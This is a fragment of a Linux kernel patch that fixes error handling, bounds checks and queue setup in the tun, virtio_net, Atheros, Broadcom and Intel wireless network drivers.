+index 91d198aff2f9a..7c8db8f6f661e 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -1748,7 +1748,7 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 	u32 rxhash = 0;
+ 	int skb_xdp = 1;
+ 	bool frags = tun_napi_frags_enabled(tfile);
+-	enum skb_drop_reason drop_reason;
++	enum skb_drop_reason drop_reason = SKB_DROP_REASON_NOT_SPECIFIED;
+ 
+ 	if (!(tun->flags & IFF_NO_PI)) {
+ 		if (len < sizeof(pi))
+@@ -1809,10 +1809,9 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 		 * skb was created with generic XDP routine.
+ 		 */
+ 		skb = tun_build_skb(tun, tfile, from, &gso, len, &skb_xdp);
+-		if (IS_ERR(skb)) {
+-			dev_core_stats_rx_dropped_inc(tun->dev);
+-			return PTR_ERR(skb);
+-		}
++		err = PTR_ERR_OR_ZERO(skb);
++		if (err)
++			goto drop;
+ 		if (!skb)
+ 			return total_len;
+ 	} else {
+@@ -1837,13 +1836,9 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 					    noblock);
+ 		}
+ 
+-		if (IS_ERR(skb)) {
+-			if (PTR_ERR(skb) != -EAGAIN)
+-				dev_core_stats_rx_dropped_inc(tun->dev);
+-			if (frags)
+-				mutex_unlock(&tfile->napi_mutex);
+-			return PTR_ERR(skb);
+-		}
++		err = PTR_ERR_OR_ZERO(skb);
++		if (err)
++			goto drop;
+ 
+ 		if (zerocopy)
+ 			err = zerocopy_sg_from_iter(skb, from);
+@@ -1853,27 +1848,14 @@ static ssize_t tun_get_user(struct tun_struct *tun, struct tun_file *tfile,
+ 		if (err) {
+ 			err = -EFAULT;
+ 			drop_reason = SKB_DROP_REASON_SKB_UCOPY_FAULT;
+-drop:
+-			dev_core_stats_rx_dropped_inc(tun->dev);
+-			kfree_skb_reason(skb, drop_reason);
+-			if (frags) {
+-				tfile->napi.skb = NULL;
+-				mutex_unlock(&tfile->napi_mutex);
+-			}
+-
+-			return err;
++			goto drop;
+ 		}
+ 	}
+ 
+ 	if (virtio_net_hdr_to_skb(skb, &gso, tun_is_little_endian(tun))) {
+ 		atomic_long_inc(&tun->rx_frame_errors);
+-		kfree_skb(skb);
+-		if (frags) {
+-			tfile->napi.skb = NULL;
+-			mutex_unlock(&tfile->napi_mutex);
+-		}
+-
+-		return -EINVAL;
++		err = -EINVAL;
++		goto free_skb;
+ 	}
+ 
+ 	switch (tun->flags & TUN_TYPE_MASK) {
+@@ -1889,9 +1871,8 @@ drop:
+ 				pi.proto = htons(ETH_P_IPV6);
+ 				break;
+ 			default:
+-				dev_core_stats_rx_dropped_inc(tun->dev);
+-				kfree_skb(skb);
+-				return -EINVAL;
++				err = -EINVAL;
++				goto drop;
+ 			}
+ 		}
+ 
+@@ -1933,11 +1914,7 @@ drop:
+ 			if (ret != XDP_PASS) {
+ 				rcu_read_unlock();
+ 				local_bh_enable();
+-				if (frags) {
+-					tfile->napi.skb = NULL;
+-					mutex_unlock(&tfile->napi_mutex);
+-				}
+-				return total_len;
++				goto unlock_frags;
+ 			}
+ 		}
+ 		rcu_read_unlock();
+@@ -1994,6 +1971,14 @@ napi_busy:
+ 		int queue_len;
+ 
+ 		spin_lock_bh(&queue->lock);
++
++		if (unlikely(tfile->detached)) {
++			spin_unlock_bh(&queue->lock);
++			rcu_read_unlock();
++			err = -EBUSY;
++			goto free_skb;
++		}
++
+ 		__skb_queue_tail(queue, skb);
+ 		queue_len = skb_queue_len(queue);
+ 		spin_unlock(&queue->lock);
+@@ -2017,6 +2002,22 @@ napi_busy:
+ 		tun_flow_update(tun, rxhash, tfile);
+ 
+ 	return total_len;
++
++drop:
++	if (err != -EAGAIN)
++		dev_core_stats_rx_dropped_inc(tun->dev);
++
++free_skb:
++	if (!IS_ERR_OR_NULL(skb))
++		kfree_skb_reason(skb, drop_reason);
++
++unlock_frags:
++	if (frags) {
++		tfile->napi.skb = NULL;
++		mutex_unlock(&tfile->napi_mutex);
++	}
++
++	return err ?: total_len;
+ }
+ 
+ static ssize_t tun_chr_write_iter(struct kiocb *iocb, struct iov_iter *from)
+@@ -2513,6 +2514,13 @@ build:
+ 	if (tfile->napi_enabled) {
+ 		queue = &tfile->sk.sk_write_queue;
+ 		spin_lock(&queue->lock);
++
++		if (unlikely(tfile->detached)) {
++			spin_unlock(&queue->lock);
++			kfree_skb(skb);
++			return -EBUSY;
++		}
++
+ 		__skb_queue_tail(queue, skb);
+ 		spin_unlock(&queue->lock);
+ 		ret = 1;
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 9a612b13b4e46..47788f0935514 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1697,6 +1697,38 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
+ 	return received;
+ }
+ 
++static void virtnet_disable_queue_pair(struct virtnet_info *vi, int qp_index)
++{
++	virtnet_napi_tx_disable(&vi->sq[qp_index].napi);
++	napi_disable(&vi->rq[qp_index].napi);
++	xdp_rxq_info_unreg(&vi->rq[qp_index].xdp_rxq);
++}
++
++static int virtnet_enable_queue_pair(struct virtnet_info *vi, int qp_index)
++{
++	struct net_device *dev = vi->dev;
++	int err;
++
++	err = xdp_rxq_info_reg(&vi->rq[qp_index].xdp_rxq, dev, qp_index,
++			       vi->rq[qp_index].napi.napi_id);
++	if (err < 0)
++		return err;
++
++	err = xdp_rxq_info_reg_mem_model(&vi->rq[qp_index].xdp_rxq,
++					 MEM_TYPE_PAGE_SHARED, NULL);
++	if (err < 0)
++		goto err_xdp_reg_mem_model;
++
++	virtnet_napi_enable(vi->rq[qp_index].vq, &vi->rq[qp_index].napi);
++	virtnet_napi_tx_enable(vi, vi->sq[qp_index].vq, &vi->sq[qp_index].napi);
++
++	return 0;
++
++err_xdp_reg_mem_model:
++	xdp_rxq_info_unreg(&vi->rq[qp_index].xdp_rxq);
++	return err;
++}
++
+ static int virtnet_open(struct net_device *dev)
+ {
+ 	struct virtnet_info *vi = netdev_priv(dev);
+@@ -1710,22 +1742,20 @@ static int virtnet_open(struct net_device *dev)
+ 			if (!try_fill_recv(vi, &vi->rq[i], GFP_KERNEL))
+ 				schedule_delayed_work(&vi->refill, 0);
+ 
+-		err = xdp_rxq_info_reg(&vi->rq[i].xdp_rxq, dev, i, vi->rq[i].napi.napi_id);
++		err = virtnet_enable_queue_pair(vi, i);
+ 		if (err < 0)
+-			return err;
+-
+-		err = xdp_rxq_info_reg_mem_model(&vi->rq[i].xdp_rxq,
+-						 MEM_TYPE_PAGE_SHARED, NULL);
+-		if (err < 0) {
+-			xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+-			return err;
+-		}
+-
+-		virtnet_napi_enable(vi->rq[i].vq, &vi->rq[i].napi);
+-		virtnet_napi_tx_enable(vi, vi->sq[i].vq, &vi->sq[i].napi);
++			goto err_enable_qp;
+ 	}
+ 
+ 	return 0;
++
++err_enable_qp:
++	disable_delayed_refill(vi);
++	cancel_delayed_work_sync(&vi->refill);
++
++	for (i--; i >= 0; i--)
++		virtnet_disable_queue_pair(vi, i);
++	return err;
+ }
+ 
+ static int virtnet_poll_tx(struct napi_struct *napi, int budget)
+@@ -2157,11 +2187,8 @@ static int virtnet_close(struct net_device *dev)
+ 	/* Make sure refill_work doesn't re-enable napi! */
+ 	cancel_delayed_work_sync(&vi->refill);
+ 
+-	for (i = 0; i < vi->max_queue_pairs; i++) {
+-		napi_disable(&vi->rq[i].napi);
+-		xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+-		virtnet_napi_tx_disable(&vi->sq[i].napi);
+-	}
++	for (i = 0; i < vi->max_queue_pairs; i++)
++		virtnet_disable_queue_pair(vi, i);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/wireless/ath/ath.h b/drivers/net/wireless/ath/ath.h
+index f083fb9038c36..f02a308a9ffc5 100644
+--- a/drivers/net/wireless/ath/ath.h
++++ b/drivers/net/wireless/ath/ath.h
+@@ -96,11 +96,13 @@ struct ath_keyval {
+ 	u8 kv_type;
+ 	u8 kv_pad;
+ 	u16 kv_len;
+-	u8 kv_val[16]; /* TK */
+-	u8 kv_mic[8]; /* Michael MIC key */
+-	u8 kv_txmic[8]; /* Michael MIC TX key (used only if the hardware
+-			 * supports both MIC keys in the same key cache entry;
+-			 * in that case, kv_mic is the RX key) */
++	struct_group(kv_values,
++		u8 kv_val[16]; /* TK */
++		u8 kv_mic[8]; /* Michael MIC key */
++		u8 kv_txmic[8]; /* Michael MIC TX key (used only if the hardware
++				 * supports both MIC keys in the same key cache entry;
++				 * in that case, kv_mic is the RX key) */
++	);
+ };
+ 
+ enum ath_cipher {
+diff --git a/drivers/net/wireless/ath/ath11k/dp.c b/drivers/net/wireless/ath/ath11k/dp.c
+index f5156a7fbdd7a..d070bcb3fe247 100644
+--- a/drivers/net/wireless/ath/ath11k/dp.c
++++ b/drivers/net/wireless/ath/ath11k/dp.c
+@@ -36,6 +36,7 @@ void ath11k_dp_peer_cleanup(struct ath11k *ar, int vdev_id, const u8 *addr)
+ 	}
+ 
+ 	ath11k_peer_rx_tid_cleanup(ar, peer);
++	peer->dp_setup_done = false;
+ 	crypto_free_shash(peer->tfm_mmic);
+ 	spin_unlock_bh(&ab->base_lock);
+ }
+@@ -72,7 +73,8 @@ int ath11k_dp_peer_setup(struct ath11k *ar, int vdev_id, const u8 *addr)
+ 	ret = ath11k_peer_rx_frag_setup(ar, addr, vdev_id);
+ 	if (ret) {
+ 		ath11k_warn(ab, "failed to setup rx defrag context\n");
+-		return ret;
++		tid--;
++		goto peer_clean;
+ 	}
+ 
+ 	/* TODO: Setup other peer specific resource used in data path */
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index e964e1b722871..38be646bc0214 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -389,10 +389,10 @@ int ath11k_dp_rxbufs_replenish(struct ath11k_base *ab, int mac_id,
+ 			goto fail_free_skb;
+ 
+ 		spin_lock_bh(&rx_ring->idr_lock);
+-		buf_id = idr_alloc(&rx_ring->bufs_idr, skb, 0,
+-				   rx_ring->bufs_max * 3, GFP_ATOMIC);
++		buf_id = idr_alloc(&rx_ring->bufs_idr, skb, 1,
++				   (rx_ring->bufs_max * 3) + 1, GFP_ATOMIC);
+ 		spin_unlock_bh(&rx_ring->idr_lock);
+-		if (buf_id < 0)
++		if (buf_id <= 0)
+ 			goto fail_dma_unmap;
+ 
+ 		desc = ath11k_hal_srng_src_get_next_entry(ab, srng);
+@@ -2665,6 +2665,9 @@ try_again:
+ 				   cookie);
+ 		mac_id = FIELD_GET(DP_RXDMA_BUF_COOKIE_PDEV_ID, cookie);
+ 
++		if (unlikely(buf_id == 0))
++			continue;
++
+ 		ar = ab->pdevs[mac_id].ar;
+ 		rx_ring = &ar->dp.rx_refill_buf_ring;
+ 		spin_lock_bh(&rx_ring->idr_lock);
+@@ -3138,6 +3141,7 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ 	}
+ 
+ 	peer->tfm_mmic = tfm;
++	peer->dp_setup_done = true;
+ 	spin_unlock_bh(&ab->base_lock);
+ 
+ 	return 0;
+@@ -3583,6 +3587,13 @@ static int ath11k_dp_rx_frag_h_mpdu(struct ath11k *ar,
+ 		ret = -ENOENT;
+ 		goto out_unlock;
+ 	}
++	if (!peer->dp_setup_done) {
++		ath11k_warn(ab, "The peer %pM [%d] has uninitialized datapath\n",
++			    peer->addr, peer_id);
++		ret = -ENOENT;
++		goto out_unlock;
++	}
++
+ 	rx_tid = &peer->rx_tid[tid];
+ 
+ 	if ((!skb_queue_empty(&rx_tid->rx_frags) && seqno != rx_tid->cur_sn) ||
+diff --git a/drivers/net/wireless/ath/ath11k/peer.h b/drivers/net/wireless/ath/ath11k/peer.h
+index 6dd17bafe3a0c..9bd385d0a38c9 100644
+--- a/drivers/net/wireless/ath/ath11k/peer.h
++++ b/drivers/net/wireless/ath/ath11k/peer.h
+@@ -35,6 +35,7 @@ struct ath11k_peer {
+ 	u16 sec_type;
+ 	u16 sec_type_grp;
+ 	bool is_authorized;
++	bool dp_setup_done;
+ };
+ 
+ void ath11k_peer_unmap_event(struct ath11k_base *ab, u16 peer_id);
+diff --git a/drivers/net/wireless/ath/key.c b/drivers/net/wireless/ath/key.c
+index 61b59a804e308..b7b61d4f02bae 100644
+--- a/drivers/net/wireless/ath/key.c
++++ b/drivers/net/wireless/ath/key.c
+@@ -503,7 +503,7 @@ int ath_key_config(struct ath_common *common,
+ 
+ 	hk.kv_len = key->keylen;
+ 	if (key->keylen)
+-		memcpy(hk.kv_val, key->key, key->keylen);
++		memcpy(&hk.kv_values, key->key, key->keylen);
+ 
+ 	if (!(key->flags & IEEE80211_KEY_FLAG_PAIRWISE)) {
+ 		switch (vif->type) {
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index 2cc913acfc2d7..ad5a8d61d9385 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -1351,13 +1351,14 @@ static int brcmf_set_pmk(struct brcmf_if *ifp, const u8 *pmk_data, u16 pmk_len)
+ {
+ 	struct brcmf_pub *drvr = ifp->drvr;
+ 	struct brcmf_wsec_pmk_le pmk;
+-	int i, err;
++	int err;
++
++	memset(&pmk, 0, sizeof(pmk));
+ 
+-	/* convert to firmware key format */
+-	pmk.key_len = cpu_to_le16(pmk_len << 1);
+-	pmk.flags = cpu_to_le16(BRCMF_WSEC_PASSPHRASE);
+-	for (i = 0; i < pmk_len; i++)
+-		snprintf(&pmk.key[2 * i], 3, "%02x", pmk_data[i]);
++	/* pass pmk directly */
++	pmk.key_len = cpu_to_le16(pmk_len);
++	pmk.flags = cpu_to_le16(0);
++	memcpy(pmk.key, pmk_data, pmk_len);
+ 
+ 	/* store psk in firmware */
+ 	err = brcmf_fil_cmd_data_set(ifp, BRCMF_C_SET_WSEC_PMK,
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 067ea019b110a..3b1277a8bd617 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -13,6 +13,7 @@
+ #include <linux/bcma/bcma.h>
+ #include <linux/sched.h>
+ #include <linux/io.h>
++#include <linux/random.h>
+ #include <asm/unaligned.h>
+ 
+ #include <soc.h>
+@@ -1631,6 +1632,13 @@ brcmf_pcie_init_share_ram_info(struct brcmf_pciedev_info *devinfo,
+ 	return 0;
+ }
+ 
++struct brcmf_random_seed_footer {
++	__le32 length;
++	__le32 magic;
++};
++
++#define BRCMF_RANDOM_SEED_MAGIC		0xfeedc0de
++#define BRCMF_RANDOM_SEED_LENGTH	0x100
+ 
+ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 					const struct firmware *fw, void *nvram,
+@@ -1667,6 +1675,30 @@ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 			  nvram_len;
+ 		memcpy_toio(devinfo->tcm + address, nvram, nvram_len);
+ 		brcmf_fw_nvram_free(nvram);
++
++		if (devinfo->otp.valid) {
++			size_t rand_len = BRCMF_RANDOM_SEED_LENGTH;
++			struct brcmf_random_seed_footer footer = {
++				.length = cpu_to_le32(rand_len),
++				.magic = cpu_to_le32(BRCMF_RANDOM_SEED_MAGIC),
++			};
++			void *randbuf;
++
++			/* Some Apple chips/firmwares expect a buffer of random
++			 * data to be present before NVRAM
++			 */
++			brcmf_dbg(PCIE, "Download random seed\n");
++
++			address -= sizeof(footer);
++			memcpy_toio(devinfo->tcm + address, &footer,
++				    sizeof(footer));
++
++			address -= rand_len;
++			randbuf = kzalloc(rand_len, GFP_KERNEL);
++			get_random_bytes(randbuf, rand_len);
++			memcpy_toio(devinfo->tcm + address, randbuf, rand_len);
++			kfree(randbuf);
++		}
+ 	} else {
+ 		brcmf_dbg(PCIE, "No matching NVRAM file found %s\n",
+ 			  devinfo->nvram_name);
+diff --git a/drivers/net/wireless/intel/iwlwifi/dvm/sta.c b/drivers/net/wireless/intel/iwlwifi/dvm/sta.c
+index cef43cf80620a..8b01ab986cb13 100644
+--- a/drivers/net/wireless/intel/iwlwifi/dvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/dvm/sta.c
+@@ -1081,6 +1081,7 @@ static int iwlagn_send_sta_key(struct iwl_priv *priv,
+ {
+ 	__le16 key_flags;
+ 	struct iwl_addsta_cmd sta_cmd;
++	size_t to_copy;
+ 	int i;
+ 
+ 	spin_lock_bh(&priv->sta_lock);
+@@ -1100,7 +1101,9 @@ static int iwlagn_send_sta_key(struct iwl_priv *priv,
+ 		sta_cmd.key.tkip_rx_tsc_byte2 = tkip_iv32;
+ 		for (i = 0; i < 5; i++)
+ 			sta_cmd.key.tkip_rx_ttak[i] = cpu_to_le16(tkip_p1k[i]);
+-		memcpy(sta_cmd.key.key, keyconf->key, keyconf->keylen);
++		/* keyconf may contain MIC rx/tx keys which iwl does not use */
++		to_copy = min_t(size_t, sizeof(sta_cmd.key.key), keyconf->keylen);
++		memcpy(sta_cmd.key.key, keyconf->key, to_copy);
+ 		break;
+ 	case WLAN_CIPHER_SUITE_WEP104:
+ 		key_flags |= STA_KEY_FLG_KEY_SIZE_MSK;
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index a02e5a67b7066..585e8cd2d332d 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -38,7 +38,7 @@ static const struct dmi_system_id dmi_ppag_approved_list[] = {
+ 	},
+ 	{ .ident = "ASUS",
+ 	  .matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTek COMPUTER INC."),
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 		},
+ 	},
+ 	{}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index 027360e63b926..3ef0b776b7727 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -1664,14 +1664,10 @@ static __le32 iwl_get_mon_reg(struct iwl_fw_runtime *fwrt, u32 alloc_id,
+ }
+ 
+ static void *
+-iwl_dump_ini_mon_fill_header(struct iwl_fw_runtime *fwrt,
+-			     struct iwl_dump_ini_region_data *reg_data,
++iwl_dump_ini_mon_fill_header(struct iwl_fw_runtime *fwrt, u32 alloc_id,
+ 			     struct iwl_fw_ini_monitor_dump *data,
+ 			     const struct iwl_fw_mon_regs *addrs)
+ {
+-	struct iwl_fw_ini_region_tlv *reg = (void *)reg_data->reg_tlv->data;
+-	u32 alloc_id = le32_to_cpu(reg->dram_alloc_id);
+-
+ 	if (!iwl_trans_grab_nic_access(fwrt->trans)) {
+ 		IWL_ERR(fwrt, "Failed to get monitor header\n");
+ 		return NULL;
+@@ -1702,8 +1698,10 @@ iwl_dump_ini_mon_dram_fill_header(struct iwl_fw_runtime *fwrt,
+ 				  void *data, u32 data_len)
+ {
+ 	struct iwl_fw_ini_monitor_dump *mon_dump = (void *)data;
++	struct iwl_fw_ini_region_tlv *reg = (void *)reg_data->reg_tlv->data;
++	u32 alloc_id = le32_to_cpu(reg->dram_alloc_id);
+ 
+-	return iwl_dump_ini_mon_fill_header(fwrt, reg_data, mon_dump,
++	return iwl_dump_ini_mon_fill_header(fwrt, alloc_id, mon_dump,
+ 					    &fwrt->trans->cfg->mon_dram_regs);
+ }
+ 
+@@ -1713,8 +1711,10 @@ iwl_dump_ini_mon_smem_fill_header(struct iwl_fw_runtime *fwrt,
+ 				  void *data, u32 data_len)
+ {
+ 	struct iwl_fw_ini_monitor_dump *mon_dump = (void *)data;
++	struct iwl_fw_ini_region_tlv *reg = (void *)reg_data->reg_tlv->data;
++	u32 alloc_id = le32_to_cpu(reg->internal_buffer.alloc_id);
+ 
+-	return iwl_dump_ini_mon_fill_header(fwrt, reg_data, mon_dump,
++	return iwl_dump_ini_mon_fill_header(fwrt, alloc_id, mon_dump,
+ 					    &fwrt->trans->cfg->mon_smem_regs);
+ }
+ 
+@@ -1725,7 +1725,10 @@ iwl_dump_ini_mon_dbgi_fill_header(struct iwl_fw_runtime *fwrt,
+ {
+ 	struct iwl_fw_ini_monitor_dump *mon_dump = (void *)data;
+ 
+-	return iwl_dump_ini_mon_fill_header(fwrt, reg_data, mon_dump,
++	return iwl_dump_ini_mon_fill_header(fwrt,
++					    /* no offset calculation later */
++					    IWL_FW_INI_ALLOCATION_ID_DBGC1,
++					    mon_dump,
+ 					    &fwrt->trans->cfg->mon_dbgi_regs);
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index 5de34edc51fe9..887d0789c96c3 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -1055,7 +1055,7 @@ static const struct dmi_system_id dmi_tas_approved_list[] = {
+ 	},
+ 		{ .ident = "LENOVO",
+ 	  .matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Lenovo"),
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+ 		},
+ 	},
+ 	{ .ident = "DELL",
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index a841268e0709f..801098c5183b6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -3445,7 +3445,7 @@ static int __iwl_mvm_mac_set_key(struct ieee80211_hw *hw,
+ 	struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif);
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 	struct iwl_mvm_sta *mvmsta = NULL;
+-	struct iwl_mvm_key_pn *ptk_pn;
++	struct iwl_mvm_key_pn *ptk_pn = NULL;
+ 	int keyidx = key->keyidx;
+ 	int ret, i;
+ 	u8 key_offset;
+@@ -3590,6 +3590,10 @@ static int __iwl_mvm_mac_set_key(struct ieee80211_hw *hw,
+ 		if (ret) {
+ 			IWL_WARN(mvm, "set key failed\n");
+ 			key->hw_key_idx = STA_KEY_IDX_INVALID;
++			if (ptk_pn) {
++				RCU_INIT_POINTER(mvmsta->ptk_pn[keyidx], NULL);
++				kfree(ptk_pn);
++			}
+ 			/*
+ 			 * can't add key for RX, but we don't need it
+ 			 * in the device for TX so still return 0,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c b/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c
+index 6d18a1fd649b9..fdf60afb0f3f2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c
+@@ -445,6 +445,11 @@ iwl_mvm_update_mcc(struct iwl_mvm *mvm, const char *alpha2,
+ 		struct iwl_mcc_update_resp *mcc_resp = (void *)pkt->data;
+ 
+ 		n_channels =  __le32_to_cpu(mcc_resp->n_channels);
++		if (iwl_rx_packet_payload_len(pkt) !=
++		    struct_size(mcc_resp, channels, n_channels)) {
++			resp_cp = ERR_PTR(-EINVAL);
++			goto exit;
++		}
+ 		resp_len = sizeof(struct iwl_mcc_update_resp) +
+ 			   n_channels * sizeof(__le32);
+ 		resp_cp = kmemdup(mcc_resp, resp_len, GFP_KERNEL);
+@@ -456,6 +461,11 @@ iwl_mvm_update_mcc(struct iwl_mvm *mvm, const char *alpha2,
+ 		struct iwl_mcc_update_resp_v3 *mcc_resp_v3 = (void *)pkt->data;
+ 
+ 		n_channels =  __le32_to_cpu(mcc_resp_v3->n_channels);
++		if (iwl_rx_packet_payload_len(pkt) !=
++		    struct_size(mcc_resp_v3, channels, n_channels)) {
++			resp_cp = ERR_PTR(-EINVAL);
++			goto exit;
++		}
+ 		resp_len = sizeof(struct iwl_mcc_update_resp) +
+ 			   n_channels * sizeof(__le32);
+ 		resp_cp = kzalloc(resp_len, GFP_KERNEL);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 091225894037c..02c2a06301076 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -1975,7 +1975,7 @@ void iwl_mvm_rx_mpdu_mq(struct iwl_mvm *mvm, struct napi_struct *napi,
+ 				RCU_INIT_POINTER(mvm->csa_tx_blocked_vif, NULL);
+ 				/* Unblock BCAST / MCAST station */
+ 				iwl_mvm_modify_all_sta_disable_tx(mvm, mvmvif, false);
+-				cancel_delayed_work_sync(&mvm->cs_tx_unblock_dwork);
++				cancel_delayed_work(&mvm->cs_tx_unblock_dwork);
+ 			}
+ 		}
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index ba944175546d4..542cfcad6e0e6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -788,10 +788,11 @@ unsigned int iwl_mvm_max_amsdu_size(struct iwl_mvm *mvm,
+ 				    struct ieee80211_sta *sta, unsigned int tid)
+ {
+ 	struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta);
+-	enum nl80211_band band = mvmsta->vif->bss_conf.chandef.chan->band;
+ 	u8 ac = tid_to_mac80211_ac[tid];
++	enum nl80211_band band;
+ 	unsigned int txf;
+-	int lmac = iwl_mvm_get_lmac_id(mvm->fw, band);
++	unsigned int val;
++	int lmac;
+ 
+ 	/* For HE redirect to trigger based fifos */
+ 	if (sta->deflink.he_cap.has_he && !WARN_ON(!iwl_mvm_has_new_tx_api(mvm)))
+@@ -805,7 +806,37 @@ unsigned int iwl_mvm_max_amsdu_size(struct iwl_mvm *mvm,
+ 	 * We also want to have the start of the next packet inside the
+ 	 * fifo to be able to send bursts.
+ 	 */
+-	return min_t(unsigned int, mvmsta->max_amsdu_len,
++	val = mvmsta->max_amsdu_len;
++
++	if (hweight16(sta->valid_links) <= 1) {
++		if (sta->valid_links) {
++			struct ieee80211_bss_conf *link_conf;
++			unsigned int link = ffs(sta->valid_links) - 1;
++
++			rcu_read_lock();
++			link_conf = rcu_dereference(mvmsta->vif->link_conf[link]);
++			if (WARN_ON(!link_conf))
++				band = NL80211_BAND_2GHZ;
++			else
++				band = link_conf->chandef.chan->band;
++			rcu_read_unlock();
++		} else {
++			band = mvmsta->vif->bss_conf.chandef.chan->band;
++		}
++
++		lmac = iwl_mvm_get_lmac_id(mvm->fw, band);
++	} else if (fw_has_capa(&mvm->fw->ucode_capa,
++			       IWL_UCODE_TLV_CAPA_CDB_SUPPORT)) {
++		/* for real MLO restrict to both LMACs if they exist */
++		lmac = IWL_LMAC_5G_INDEX;
++		val = min_t(unsigned int, val,
++			    mvm->fwrt.smem_cfg.lmac[lmac].txfifo_size[txf] - 256);
++		lmac = IWL_LMAC_24G_INDEX;
++	} else {
++		lmac = IWL_LMAC_24G_INDEX;
++	}
++
++	return min_t(unsigned int, val,
+ 		     mvm->fwrt.smem_cfg.lmac[lmac].txfifo_size[txf] - 256);
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 85fadd1ef1ff3..03e8234d03520 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -504,6 +504,7 @@ static const struct pci_device_id iwl_hw_card_ids[] = {
+ 
+ /* Bz devices */
+ 	{IWL_PCI_DEVICE(0x2727, PCI_ANY_ID, iwl_bz_trans_cfg)},
++	{IWL_PCI_DEVICE(0x272b, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0xA840, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x7740, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ #endif /* CONFIG_IWLMVM */
+@@ -1685,6 +1686,9 @@ static void iwl_pci_remove(struct pci_dev *pdev)
+ {
+ 	struct iwl_trans *trans = pci_get_drvdata(pdev);
+ 
++	if (!trans)
++		return;
++
+ 	iwl_drv_stop(trans->drv);
+ 
+ 	iwl_trans_pcie_free(trans);
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 54f11f60f11c4..8e95225cdd605 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
